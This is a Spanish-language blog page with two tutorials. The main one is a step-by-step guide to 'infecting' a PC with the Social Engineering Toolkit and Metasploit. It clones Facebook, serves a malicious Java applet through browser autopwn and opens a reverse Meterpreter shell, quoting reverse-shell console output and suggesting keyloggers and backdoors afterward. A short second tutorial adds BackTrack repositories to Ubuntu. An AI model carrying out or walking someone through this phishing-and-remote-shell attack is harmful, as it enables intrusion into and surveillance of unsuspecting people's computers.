Ingeniería Social

Tutorial “Infectando Pc con ubuntu o Backtrack 5 y SET

Voy a tratar de mostrar a modo de aprendizaje como se puede controlar un Pc Remotamente con el uso de Social Engineering Toolkit, con el uso de la aplicacion SET.

El www.infector.es.tl y yo no nos responsabilizamos por el uso que cada uno le de a este tutorial.
Obviando la explicación ya que ubuntu Backtrack explica lo que hace cada opción.

Comencemos...

Podemos abrir la Aplicacion desde la linea de comando.

etc /pentest/exploits/set/

[user]:/pentest/exploits/set# ./set

O Desde el Menu

012

Ahora tenemos abierto SET.
Y vamos a elegir la Opcion 2 ”Web Site Attack Vector”

5456

Lo que hacemos aquí basicamente es atacar los vectores del sitio, es decir nos va a cargar un Java Applet indicando al usuario que es necesario permitir la ejecucion de de un Complemento Java (malicioso en este caso) para poder
ver el sitio correctamente.

Ahora nos saldra una series mas de opciones para seguir realizando el Ataque.
En este tambien eligiremos la Opcion 2 ”The Metasploit Browser Exploit Method”

464546

Porque la opción 2? Bueno es para lanzar explioit solo para el navegador a traves de Metasploit. Afecta tanto a plataformas como Windows, Linux y Mac.

Nos saldra otra series de Opciones vamos a elegir la Opción 1. “Web Template”. Elegimos esta opción por que es a modo Instructivo y SET Cargara los sitios pre-definidos que incluye.

786545

Luego vamos a elegir unos de los Sitios cargados por default de SET. El infaltable “Facebook opción 4” eligiremos.

6456456

Vemos que SET nos carga las diferentes variantes de Ataque, pero vamos a Usar la Opcion 22 ”Metasploit Browser Autopwn”.
Esta opción es para usar todas las variantes de nuestro Amigo MSF.
Y Luego eligiremos la Opción 2 ”Windows Reverse_TCP Meterpreter”, para tratar de Puentear al AV y abrirnos una Sesion en la PC Remota y puede hacer nuestras cosillas.
Nos solicita que ingresemos el Puerto al que el Usuario se conectara con nosotros, yo le puse el puerto 80 (HTTP) pero pueden usar el que ustedes desean, por ej:443

563563

Luego comenzara la carga de MSF y Exploits y se pondra a la escucha en el puerto.
Una vez cargados nos figura esto.

5666666666

Listo tenemos nuestro sitio clonado, MSF cargado y puertos a la escucha y ahora?

Lo que nosotros debemos enviarle al usuario es nuestra Ip Local (mi Caso maquina virtual) como el ejemplo Local Ip 10.0.0.64

Sitio clonado en Backtrck 5 usando Firefox funcionando.

6684645

Funcionando en maquina Host mi PC con windows 7.

7845678645

Funciona perfecto. Lo que no realice fueron las capturas de cuando doy permisos a mi navegador para que ejecute Java y como se veria en backtrack que pico el anzuelo.

Nos figurara en la ventana de comandos algo asi como:

“Responding With Exploits”
“Payload Will Be a java reverse Shell to 200.42.57.124 from [ip usuario al que enviamos]
“Generated jar to drop…”

Una vez logrado esto, podemos hacer infinitas de cosas a nuestro antojo, como mandarle un Keyloger, abrirnos un Backdoor en fin muchas cosas.

Y con Meterpreter que es la opcion que elegimos nos abrimos una Shell y jugar un poco.

Es un tutorial bastante básico pero les mostré unas de las herramientas que nos puede ser bastante útil en algunos casos, para lo que no estén muy familiarizados con BT o en caso SET.

 

Instalar aplicaciones de BackTrack en Ubuntu

Hola a todos, en este tutorial les enseñare a como poder instalar todas las aplicaciones de backtrack 5 en su sistema operativo ubuntu esto lo probé en mi ubuntu 11.10 y no se si funcionará en alguna versión pasada aunque creo que si ya que backtrack 5 se basa en ubuntu 9.10 así que supongo que funcionan todas las versiones intermedias, bueno comenzamos:

Lo primero que tenemos que hacer es actualizar nuestro ubuntu, abrimos la terminal y ponemos este comando:

-  sudo apt-get update && sudo apt-get dist-upgrade  y tambien este código despues de terminado el pasado  sudo apt-get install build-essential

Ponemos la letra S de si y enter (para confirmar que queremos instalar el paquete), bien ya tenemos actualizado nuestro ubuntu  .:D

Después ocuparemos instalar los siguientes programas (los pondré en el mismo cuadro y ustedes van instalando uno por uno, les recomiendo copiar y pegar el código para que no se equivoquen, usen el mouse por que ctrl + v no funciona en la terminal)  compiladores C y C++, Autotools, X11, OpenGL y Free-Type, para que los programas funcionen correctamente lo instalamos usando estos códigos

-  sudo apt-get install build-essential checkinstall sudo apt-get install autoconf automake autotools-dev m4 sudo apt-get install libx11-dev sudo apt-get install freeglut3-dev sudo apt-get install libxft-dev RECUERDA, UNO POR UNO!

Después que tengamos todo lo necesario pasaremos a añadir los repositorios ¿que es eso? el código que meteremos sera para darle la orden al sistema que descargue las actualización y programas que el backtrack descarga, sera como si tuviéramos backtrack 5 :D

Ponemos este código en la terminal:

- sudo gedit /etc/apt/sources.list

Este código te abrirá un archivo donde agregaras los siguientes datos, puedes agregarlos en la sección de archivos confiables de ubuntu, si no sabes ingles no te preocupes, añádelos hasta el final del documento (son diferentes para 32 y 64 bits, ok?):

PARA 32 BITS:

-  deb http://all.repository.backtrack-linux.org revolution main microverse non-free testing deb http://32.repository.backtrack-linux.org revolution main microverse non-free testing deb http://source.repository.backtrack-linux.org revolution main microverse non-free testing

PARA 64 BITS:

-  deb http://all.repository.backtrack-linux.org revolution main microverse non-free testing deb http://64.repository.backtrack-linux.org revolution main microverse non-free testing deb http://source.repository.backtrack-linux.org revolution main microverse non-free testing

Damos en el Botón “Guardar” en el documento y volvemos a la terminal y agregamos este código:

-  wget -q http://all.repository.backtrack-linux.org/backtrack.gpg -O- | sudo apt-key add -

Despues de hacer todo eso volveremos a actualizar nuestro ubuntu pero esta vez recibiremos actualizaciones de backtrack 5 :D

- sudo apt-get update && sudo apt-get dist-upgrade

TENDREMOS QUE REINICIAR NUESTRO EQUIPO PARA QUE SE GUARDEN LOS CAMBIOS. YA REINICIADO TENDREMOS QUE DESCARGAR SYNAPTICS DESDE EL CENTRO DE SOFTWARE DE UBUNTU Y LO EJECUTAMOS.

Le damos en buscar y ponemos “BackTrack” y nos mostrara una lista y seleccionamos todos los programas que encuentre, MENOS LOS QUE DICEN 64 ya que son para 64 bits y podrían fallar y listo dan clic en aceptar y comenzara la descarga de los programas de backtrack, son aprox. 2 gb se descargan pronto

untubu1

Ejemplo de la búsqueda.

untubu2

aqui ya nos encontro los archivos y los seleccionaremos MENOS LOS QUE DIGAN 64!

Y aqui una screen del sistema funcionando con sus aplicaciones

untubu3

Espero les haya servido este tutorial.




hit counter